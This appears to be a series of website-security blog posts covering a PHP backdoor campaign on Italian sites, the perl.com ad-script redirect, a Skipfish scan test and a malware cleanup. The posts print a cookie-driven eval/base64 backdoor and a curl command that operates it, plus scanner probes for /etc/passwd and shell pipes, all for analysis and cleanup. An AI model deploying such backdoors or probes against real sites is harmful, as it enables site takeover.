Lots of Italian sites getting hacked – Initial analysis

Over the last few days we have been seeing a large number of reports of Italian sites getting hacked, way more than average and way more than from any other country. We got a chance to analyze a couple of them, and they all look very much the same.

What is interesting is that we are seeing a wide range of sites, from WordPress blogs to Joomla-based ones and even simple HTML-only sites. Plus, they are hosted with a large variety of hosting companies, ruling out a shared-server compromise.

Analysis of the attack

All the sites we analyzed followed a similar pattern. First, a script mailcheck.php was added to the root directory of the site:

<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIl9kZSgk..'));
echo "checking email…"; ?>

If you decode this script by changing the "eval" to "echo", you can see what it is doing:

$ php mailcheck.php
if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}checking email…

So mailcheck.php is a backdoor that executes whatever command the attacker sends via the PHPSESSIID cookie.
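To make that concrete, here is a hypothetical example of how an attacker could drive it (placeholder hostname; the payload is just base64-encoded PHP):

$ # encode the PHP to run, then hand it to the backdoor via the cookie
$ PAYLOAD=$(printf 'phpinfo();' | base64)
$ curl -s -b "PHPSESSIID=$PAYLOAD" http://victim.example/mailcheck.php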

Also, at the top of every index file they added the following:

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script
language="javascript">function t(){return z($a);}var $a="Z64aZ3dZ22fqb0t-
7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~
tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3e
..
;}//important security update ?>

They try to hide what they are doing with a "security_update" name at the start and an "important security update" comment at the end. Very clever… In fact, one of our clients saw it and didn't want to remove the code because he thought it really was an important update.

What this code does is inject malicious javascript that redirects visitors and loads malware from a couple of other sites. You can see the payload by changing the "eval" to an "alert" and tidying up the decoded output.


Are you seeing issues like this on your site? If you are infected, try removing those files and looking for strange entries in your index files; the sketch below is a starting point. Also, my recommendation is to revert to a previous (and clean) backup, or do a full scan of your entire site to make sure nothing is hidden in there. As always, you can contact us for help.
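If you want to hunt for the pieces described above yourself, something like this is a reasonable starting point (a sketch; adjust the patterns to what you actually find):

$ # the dropped backdoor file
$ find . -name mailcheck.php
$ # the code prepended to the index files
$ grep -rl "ob_start('security_update')" .
$ # generic encoded evals, the usual smoking gun
$ grep -rlE 'eval\(base64_decode' --include='*.php' .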

Want to read more stories like this one? Follow @sucuri_security on twitter or subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net.

APT – Attempting to steal your domain

We all hear about APTs (advanced persistent threats), and this is a good example of one trying to steal the vl.com domain. Very good read:

Dreamhost account hacked

Perl.com hacked – Security archive case study

Security Archive: Remembering security incidents to make sure we don’t commit the same mistakes over and over again.


Jan 17th, 2008. Everyone who visited the site of the famous Perl programming language (perl.com) got redirected to a porn site hosted at grepblogs.net. Uh-oh, when was it hacked? Did anyone compromise the Perl source code? What about the accounts at perl.com, were they stolen?

During incidents like these, people tend to overreact and think the worst. However, what happened was very simple… Here is the official explanation:

We at O’Reilly just got bit on perl.com, which redirected to a porn site courtesy a piece of remotely-included Javascript. One of our advertisers was using an ads system that required our pages to load Javascript from their site. It only took three things to turn perl.com into porn.com: (1) the advertiser’s domain lapsed, (2) the porn company bought it, (3) they replaced the Javascript that we were loading with a small chunk that redirected to the porn site (note that nothing on or about perl.com changed).

Very interesting… The Perl.com servers weren't hacked at all (or even touched). A remotely included javascript got modified and their site became a "porn" paradise.

The mistakes they made:

  1. They included javascript from remote sites. This is common nowadays (especially if you run ads), but you have to choose your sources wisely. Google is a good one, but grepblogs doesn't sound very authoritative.
  2. The grepblogs.net domain expired, the javascript stopped loading, and nobody noticed. That means they were not monitoring the site as they should have been.

What to learn from it and how to protect ourselves?

  1. Limit the amount of external content you embed on your site. If you need ads, choose a reputable company that will not go away and will take security seriously.
  2. Monitor the content of what you include on your site. If you have to use scripts from remote locations, regularly check that they are still in business, that the script still responds properly, and that it hasn't been compromised (see the sketch after this list).
  3. The best advice: whenever possible, store your content locally, where you control it.
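For item 2, the check can even be automated. A minimal cron-able sketch, assuming you saved a known-good checksum of the remote script beforehand (all names here are placeholders):

#!/bin/sh
# baseline created once with: curl -s "$URL" | sha256sum > /var/lib/ads.sha256
URL="http://ads.example.com/ads.js"
KNOWN=$(cut -d' ' -f1 /var/lib/ads.sha256)
LIVE=$(curl -s "$URL" | sha256sum | cut -d' ' -f1)
[ "$LIVE" = "$KNOWN" ] || echo "remote script at $URL changed or stopped loading" | mail -s "remote script alert" admin@example.com

Note that if the fetch fails entirely (say, the domain expired, as in the grepblogs case), LIVE becomes the checksum of empty input, which still differs from the baseline, so the alert fires.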

What do you think? What additional steps can we take to avoid issues like this?

A closer look at Skipfish

Skipfish was just released last week by Michal Zalewski, and it seems that in just those few days everyone is talking about it. If you haven't heard of it, it is "a fully automated, active web application security reconnaissance tool". Cool! Let's start.

I decided to give it a try against three different servers and applications to see what it does under the covers by watching the logs it generates. First, I tried it against an empty web server with a fresh Apache install, followed by a live WordPress blog, and then against my own web application (http://sucuri.net).

*btw, after the tests we nicknamed Skipfish the "404 generator" (the fastest one ever). You will understand why later.

1- Trying against an empty web server – Default Apache install

$ ./skipfish -o /var/www/out/sk http://192.168.2.15
skipfish version 1.10b by lcamtuf@google.com

Scan statistics
---------------

Scan time : 0:10:40.0182
HTTP requests : 1814 sent (2.83/s), 727.83 kB in, 221.14 kB out (1.48 kB/s)
Compression : 0.00 kB in, 0.00 kB out (0.00% gain)
HTTP exceptions : 579 net errors, 0 proto errors, 0 retried, 122265 drops
TCP connections : 587 total (3.09 req/conn)
TCP exceptions : 0 failures, 579 timeouts, 3 purged
External links : 0 skipped
Reqs pending : 0

Database statistics
-------------------

Pivots : 2 total, 2 done (100.00%)
In progress : 0 pending, 0 init, 0 attacks, 0 dict
Missing nodes : 0 spotted
Node types : 1 serv, 1 dir, 0 file, 0 pinfo, 0 unkn, 0 par, 0 val
Issues found : 2 info, 2 warn, 0 low, 2 medium, 0 high impact
Dict size : 1886 words (2 new), 63 extensions, 21 candidates

[+] Wordlist 'skipfish.wl' updated (2 new words added).
[+] Copying static resources...
[+] Sorting and annotating crawl nodes: 2
[+] Looking for duplicate entries: 2
[+] Counting unique issues: 2
[+] Writing scan description...
[+] Counting unique issues: 2
[+] Generating summary views...
[+] Report saved to '/var/www/out/sk/index.html' [0x6687dcb8].
[+] This was a great day for science!

The first scan took a while (around 10 minutes) to send only around 1,800 requests, way longer than I expected. After a brief analysis I realized that OSSEC had blocked it:

** Alert 1269261085.22134: mail  - web,accesslog,web_scan,recon,
2010 Mar 22 09:31:25 (ubuntu) 192.168.55.15->/var/log/apache2/access.log
Rule: 31151 (level 10) -> 'Mutiple web server 400 error codes from same source ip.'
Src IP: 192.168.55.15
User: (none)
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.pl HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.py HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.sh HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.sql HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.tar.gz HTTP/1.1" 404 330 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.test HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.tmp HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876/ HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"

Good to know that OSSEC did its job. For the next run I simply analyzed without OSSEC running. If you would rather keep it up while running an authorized scan, whitelisting the scanner's IP should also work; a sketch, assuming a default install:
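# in /var/ossec/etc/ossec.conf, inside the <global> section; this exempts
# the scanner's IP (the test box here) from active response:
#   <white_list>192.168.55.15</white_list>
# then restart OSSEC to apply it:
$ /var/ossec/bin/ossec-control restart

With nothing blocking it, the second run: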

$ ./skipfish -o /var/www/out/sk2 http://192.168.2.15
Scan statistics
---------------

Scan time : 0:16:02.0149
HTTP requests : 2509657 sent (2608.38/s), 1522820.00 kB in, 469407.19 kB out (2070.60 kB/s)
Compression : 0.00 kB in, 0.00 kB out (0.00% gain)
HTTP exceptions : 0 net errors, 0 proto errors, 0 retried, 0 drops
TCP connections : 24855 total (100.97 req/conn)
TCP exceptions : 0 failures, 0 timeouts, 3 purged
External links : 283 skipped
Reqs pending : 0

Database statistics
-------------------

Pivots : 591 total, 591 done (100.00%)
In progress : 0 pending, 0 init, 0 attacks, 0 dict
Missing nodes : 91 spotted
Node types : 1 serv, 53 dir, 459 file, 2 pinfo, 56 unkn, 20 par, 0 vall
Issues found : 39 info, 0 warn, 5 low, 96 medium, 0 high impact
Dict size : 2058 words (172 new), 67 extensions, 256 candidates

[+] Wordlist 'skipfish.wl' updated (172 new words added).
[+] Copying static resources...
[+] Sorting and annotating crawl nodes: 591
[+] Looking for duplicate entries: 591
[+] Counting unique issues: 164
[+] Writing scan description...
[+] Counting unique issues: 591
[+] Generating summary views...
[+] Report saved to '/var/www/out/sk2/index.html' [0x6d522ed2].
[+] This was a great day for science!

This time it took a while too, but it sent around 2.5 million requests. Wow. Let's look at the logs to see what it looks like:

192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET / HTTP/1.1" 206 45 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876 HTTP/1.1" 404 323 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.test HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.asmx HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.dll HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.inc HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.log HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /~sfi9876 HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876/ HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.pm HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.db HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.gz HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.sql HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
..
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.ora HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.part HTTP/1.1" 404 329 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.log HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.inc HTTP/1 .1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.dll HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
..
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.jsf HTTP/1.1" 404 322 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.java HTTP/1.1" 404 323 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.vb HTTP/1.1" 404 321 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.key HTTP/1.1" 404 322 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.jhtml HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b
..
192.168.55.15 - - [22/Mar/2010:10:15:05 -0300] "GET /top.ws HTTP/1.1" 404 322 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:05 -0300] "GET /top.vbs HTTP/1.1" 404 323 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:05 -0300] "GET /top.old HTTP/1.1" 404 323 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:05 -0300] "GET /top.conf HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
..
192.168.55.15 - - [22/Mar/2010:10:15:11 -0300] "GET /register.db HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:11 -0300] "GET /register.html HTTP/1.1" 404 329 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:11 -0300] "GET /register.gz HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:11 -0300] "GET /register.pm HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"

# cat /var/log/apache2/access.log | grep "SF/1.10b" | grep " 404 " | wc -l
2510915

That's lots and lots of 404s. I kid you not: my access.log is now almost 325M of nothing but 404s generated by skipfish (hence the nickname "404 generator"):

# ls -lh /var/log/apache2/
-rw-r----- 1 root adm 325M 2010-03-22 10:29 access.log

For every entry in its dictionary it tried all possible extensions, all possible names, etc. For my first test it didn't produce any useful findings, but that was expected. What I didn't expect was the sheer volume of requests, that's for sure.
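If you are curious exactly which extensions it probed, a rough one-liner over the access log summarizes them (my addition here, not part of the scan itself):

$ awk -F'"' '/SF\/1.10b/ {split($2, a, " "); print a[2]}' /var/log/apache2/access.log |
    grep -oE '\.[a-z.]+$' | sort | uniq -c | sort -rn | head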

2- Trying against a WordPress blog

I started it again with the default options and the default dictionary.

$ ./skipfish -o /var/www/out/sk3 http://blog.me
Scan statistics
---------------

Scan time : 0:49:27.0338
HTTP requests : 53864 sent (18.74/s), 484393.19 kB in, 11623.50 kB out (167.16 kB/s)
Compression : 0.00 kB in, 0.00 kB out (0.00% gain)
HTTP exceptions : 0 net errors, 0 proto errors, 0 retried, 0 drops
TCP connections : 53874 total (1.25 req/conn)
TCP exceptions : 0 failures, 0 timeouts, 0 purged
External links : 401 skipped
Reqs pending : 13280

Database statistics
-------------------

Pivots : 370 total, 50 done (13.51%)
In progress : 236 pending, 57 init, 15 attacks, 12 dict
Missing nodes : 58 spotted
Node types : 1 serv, 133 dir, 1 file, 0 pinfo, 221 unkn, 14 par, 0 val
Issues found : 15 info, 0 warn, 33 low, 114 medium, 0 high impact
Dict size : 2107 words (49 new), 70 extensions, 256 candidates

[!] Scan aborted by user, bailing out!
[+] Wordlist 'skipfish.wl' updated (49 new words added).
[+] Copying static resources...
[+] Sorting and annotating crawl nodes: 370
[+] Looking for duplicate entries: 370
[+] Counting unique issues: 304
[+] Writing scan description...
[+] Counting unique issues: 370
[+] Generating summary views...
[+] Report saved to '/var/www/out/sk3/index.html' [0x7545c75d].
[+] This was a great day for science!

Again it generated an insane amount of 404s, but this time I noticed a different check: for every directory it found, it tried this request:

1.2.83.25 - - [22/Mar/2010:13:47:32 +0000] "GET /?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_test5=cefhilno
su%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 200 30010 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:36 +0000] "GET /page/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_test5=cef
hilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:37 +0000] "GET /category/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_test5
=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:44 +0000] "GET /img/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_test5=cefh
ilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 206 2023 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:45 +0000] "GET /category/google-analytics.com/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORST
eeinnnosttx--*&_test5=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:51 +0000] "GET /category/vps/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_t
est5=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 200 16599 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:54 +0000] "GET /category/vps/logs/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx-
-*&_test5=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
1.2.83.25 - - [22/Mar/2010:13:47:59 +0000] "GET /category/vps/logs/google-analytics.com/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=C
EEFLMORSTeeinnnosttx--*&_test5=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"

What I also found interesting is that it tried to inject data through the User-Agent header as well:


1.2.83.25 - - [22/Mar/2010:13:48:03 +0000] "GET /category/vps/logs/%2F%2Fskipfish.invalid%2F%3B%3F HTTP/1.1" 404 310 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
1.2.83.25 - - [22/Mar/2010:13:48:03 +0000] "GET /category/vps/\\\\'\\\\\" HTTP/1.1" 301 - "sfish\\\\'\\\\\"" "Mozilla/5.0 SF/1.10b, sfish\\\\'\\\\\""

Here are a few more requests it made:


1.2.83.25 - - [22/Mar/2010:13:47:59 +0000] "GET /category/vps/.htaccess.aspx>\">'>'\" HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
1.2.83.25 - - [22/Mar/2010:13:47:59 +0000] "GET /category/vps/logs/google-analytics.com/?_test1=c:\\windows\\system32\\cmd.exe&_test2=%2Fetc%2Fpasswd&_test3=|%2Fbin%2Fsh&_test
4=(SELECT%20*%20FROM%20nonexistent)%20--&_test5=>%2Fno%2Fsuch%2Ffile&_test6=

Google’s Webpage removal request tool

Do you need to remove sensitive information from Google? As the tool's own page puts it: "Found a dead link in our search results? Want to help us improve our SafeSearch filter?"

Check out Google’s Webpage removal request tool:

https://www.google.com/webmasters/tools/removals?pli=1

People often complain that once something is "out there" you can't take it back, but this feature can certainly help when you have sensitive information exposed and need some damage control. Google +1.

Today is not a good day to be blacklisted

Today is definitely not a good day to be blacklisted, as Google seems to be "busy". We have been trying to help some clients get their sites reviewed and removed from Google's blacklist, but all we get in Webmaster Tools is: "Our system is currently busy. Please try again in a few minutes."

Well, we have been getting this message since last night, so even after removing all the malware and cleaning our clients' sites, we can't get Google to review them again…

Big fail for Google today. They do a good job spotting malware and blocking sites, but they also need to be fast to respond and unblock a site once it is clean. Hopefully they will be back soon.

Removing malware from a web site – Case Study

We deal with web-based malware every day here at Sucuri. Some of it is encrypted and very hard to detect and remove, but most of it is not. This case study is about the latter: simpler, but very annoying, web-based javascript malware that we dealt with. Hope you like it.

It all started a few days ago when a prospective client contacted us saying their site was being reported as an "attack site" by Google Chrome, although it was working fine on Internet Explorer. They wanted to make sure it worked well on Chrome too…

The client wasn't a technical person, so he was not aware that his site was hosting malware and had been blacklisted by Google. Every browser that uses Google's blacklist (Chrome, Firefox, etc.) would report the site as an "attack site".

Not good news for any site owner: you lose credibility, traffic, and money. If they had been using our Web-based Integrity monitor, that would not have happened, but since they weren't, it was now time to fix the problem.

We will detail the steps we took, hoping they can be useful for anyone else dealing with these issues.

1- Shutting down the site

We didn't want their site spreading more malware, so we got the FTP credentials (shared host, so no SSH access), renamed the public_html directory to something else, and added a quick "we are in maintenance mode" index.html to the site:

$ rename public_html publichtml_saved
$ mkdir public_html
$ put newindex public_html/index.html

2- Changing the passwords

We didn't know how the attackers got in, but changing the passwords was a good defense to make sure they wouldn't mess with our work or get back in. Plus, since it was a shared host, there wasn't much more we could do.

3- Analyzing the malware

To analyze the malware, we first downloaded the whole public_html directory that we had saved. As always, we used our friend ncftpget to get the job done:

$ mkdir clientX
$ ncftpget -z -u USER -p PASS -R clientX.com ./clientX /publichtml_saved

Once that was done, we ran our code-scan tool to find all the malware in the web files. We won't be sharing this tool for now, but you can easily grep for iframes, javascript pointing to external php files, or very long encoded lines to find 99% of this kind of malware. A rough sketch of that approach is below; the actual output of our tool follows it.
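A rough stand-in for the tool, with patterns tuned to this incident (a sketch, not our actual code-scan):

$ # iframes, script tags pulling .php files, and encoded evals
$ grep -rniE '<iframe|script src="?https?://[^">]+\.php|eval ?\(base64_decode' clientX/
$ # suspiciously long lines that are often encoded payloads
$ awk 'length($0) > 500 {print FILENAME ": " FNR}' clientX/public_html/*.php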

$ code-scan clientX
** PHP inside javascript: **
clientX/public_html/xx/Install.html:
<script  src="http://hentai.com.br/images/gifimg.php >
clientX/public_html/xx/License.html:
< script src=http://hentai.com.br/images/gifimg.php >
clientX/public_html/xx/file.js:
document.write("<script src="http://macagnanmalhas.com.br/imagens_fck/conteudo…
clientX/public_html/xx/file2.js:
document.write('<script src="http://hentai.com.br/images/gifimg.ph..
..

As we scanned, we noticed that EVERY single html and javascript file had a reference to these two sites included. Every single one. The hentai site had already been fixed and blacklisted by the time we analyzed it, but the other one, at macagnanmalhas, was still live. We tried to see what it was doing by dumping its content:

$ lynx --source --dump http://macagnanmalhas.com.br/imagens_fck/conteudo.php
document.write("<script src="http://craisa.com.br/up/topluto4.php>");

Hum… so it was actually pointing to another javascript at craisa.com.br, which in turn pointed at yet another site (how annoying):

$ lynx --source --dump http://craisa.com.br/up/topluto4.php
document.write("<script src="http://grupogrotta.com.br/tao/trabalhe.php />");

And that final javascript had already been removed, so we couldn't analyze it. Oh well… moving on.

We also found that every single PHP file had malware injected at the top of the script. They all started with:

<?php  eval (base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygndTVzeicpKXtmdW
jUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYp

What does this script do? After changing the "eval" to an "echo", we could see that it is basically a PHP script that injects malicious code into the site and acts as a backdoor.

4- Fixing the site

Since the attackers went crazy and infected every single file, manually removing the malware was out of the question. If the client had a backup of the site it would have been easy, but since they didn't have one either, we had to resort to some shell scripting.

What did we do? We knew there were only these three instances of malware spread across all the files, so we ran find, passing the files to sed to strip the malicious lines:

$ find ./ | grep -i -E "\.html|\.htm|\.php|\.js" | xargs sed -i "s#<?php eval (base64_decode ( .*)); ??>##g"
$ find ./ | grep -i -E "\.html|\.php|\.js" | xargs sed -i 's#<script src="http://mac.*/script"> ##g'
$ find ./ | grep -i -E "\.html|\.php|\.js" | xargs sed -i 's#< script src=http://hentai..*/script> ##g'
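Before pushing anything back, a sanity check is worth it: re-grep for the same indicators and make sure nothing matches anymore (an extra step we would suggest; patterns specific to this incident):

$ grep -rlE 'eval ?\(base64_decode|hentai\.com\.br|macagnanmalhas\.com\.br' ./clientX/public_html \
    && echo "still infected" || echo "clean"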

Done! With all files fixed, we used ncftpput to upload the clean copy back:

$ ncftpput -z -u USER -p PASS -R clientX.com /public_html ./clientX/public_html

5- Lessons Learned

Malware is a pain and anyone can be affected. In this case, though, the client had no security measures in place, which made it much harder to deal with. For reference, our suggestions were (and they apply to every site on a shared server):

  1. Make sure you have backups done at least weekly (see the sketch after this list)
  2. Use strong FTP passwords
  3. Keep your desktop virus-free
  4. Monitor your web sites for malware/blacklisting
  5. Keep your web applications updated (if using any)
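On item 1: even on an FTP-only shared host you can automate a weekly backup from any machine you control. A hypothetical cron job using ncftpget (placeholder credentials and paths):

#!/bin/sh
# run weekly from cron, e.g.: 0 3 * * 0 /home/you/bin/site-backup.sh
STAMP=$(date +%Y%m%d)
mkdir -p "$HOME/backups/site-$STAMP"
ncftpget -u USER -p PASS -R clientX.com "$HOME/backups/site-$STAMP" /public_html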

Goodbye SecurityFocus

I just read the sad announcement that SecurityFocus is going to be shut down (or "phased out", to sound nicer). The mailing lists will remain for a while, but everything else will be moved to the Symantec web site…

Take a look: http://www.securityfocus.com/news/11582:

Beginning March 15, 2010 SecurityFocus will begin a transition of its content to Symantec Connect. As part of its continued commitment to the community, all of SecurityFocus’ mailing lists including Bugtraq and its Vulnerability Database will remain online at www.securityfocus.com There will not be any changes to any of the list charters or policies and the same teams who have moderated list traffic will continue to do so. The vulnerability database will continue to be updated and made available as it is currently. DeepSight and other security intelligence related offerings will remain unchanged while Infocus articles, whitepapers, and other SecurityFocus content will be available off of the main Symantec website in the coming months.

While the news portal section of SecurityFocus will no longer be offered, we think our readers will be better served by this change as we combine our efforts with Symantec Connect and continue to provide a valuable service to the community. As always, if you have any questions or concerns you can reach us at editor-at-securityfocus-dot-com.

SecurityFocus was a good site while it lasted and served its purpose very well.

Cloud-based (FILE) Integrity Monitoring

If you are a system administrator or have ever worked with security, you have probably heard the terms file integrity monitoring or file integrity checking. If you haven't, you have at least heard of Tripwire, OSSEC, or AIDE (all popular open source file integrity checking tools).

How do they work? Generally they are installed on a server, where they create a cryptographic checksum of all the critical files (and registry entries), and if/when something changes you get an alert. Useful, no? So if an attacker (or anyone) modifies your hosts file, you get the alert: "File /etc/hosts has been modified".
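The core idea fits in a few lines of shell (a minimal sketch of the concept, not how Tripwire or OSSEC actually store their databases):

$ # 1) record a baseline of checksums for critical files
$ sha256sum /etc/hosts /etc/passwd /etc/ssh/sshd_config > /var/lib/fim.baseline
$ # 2) later, from cron, re-check and alert on any change
$ sha256sum -c --quiet /var/lib/fim.baseline || \
    echo "integrity alert: a monitored file changed" | mail -s "FIM alert" root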

Yes, very useful!

However, as we move to a cloud-based world, how can this still work?

Your email is now stored at Gmail; your Whois data is stored at a registrar you don't control; your DNS may be hosted externally too, where you can't verify locally whether the zones have changed; your sites may be hosted at multiple locations outside your control.
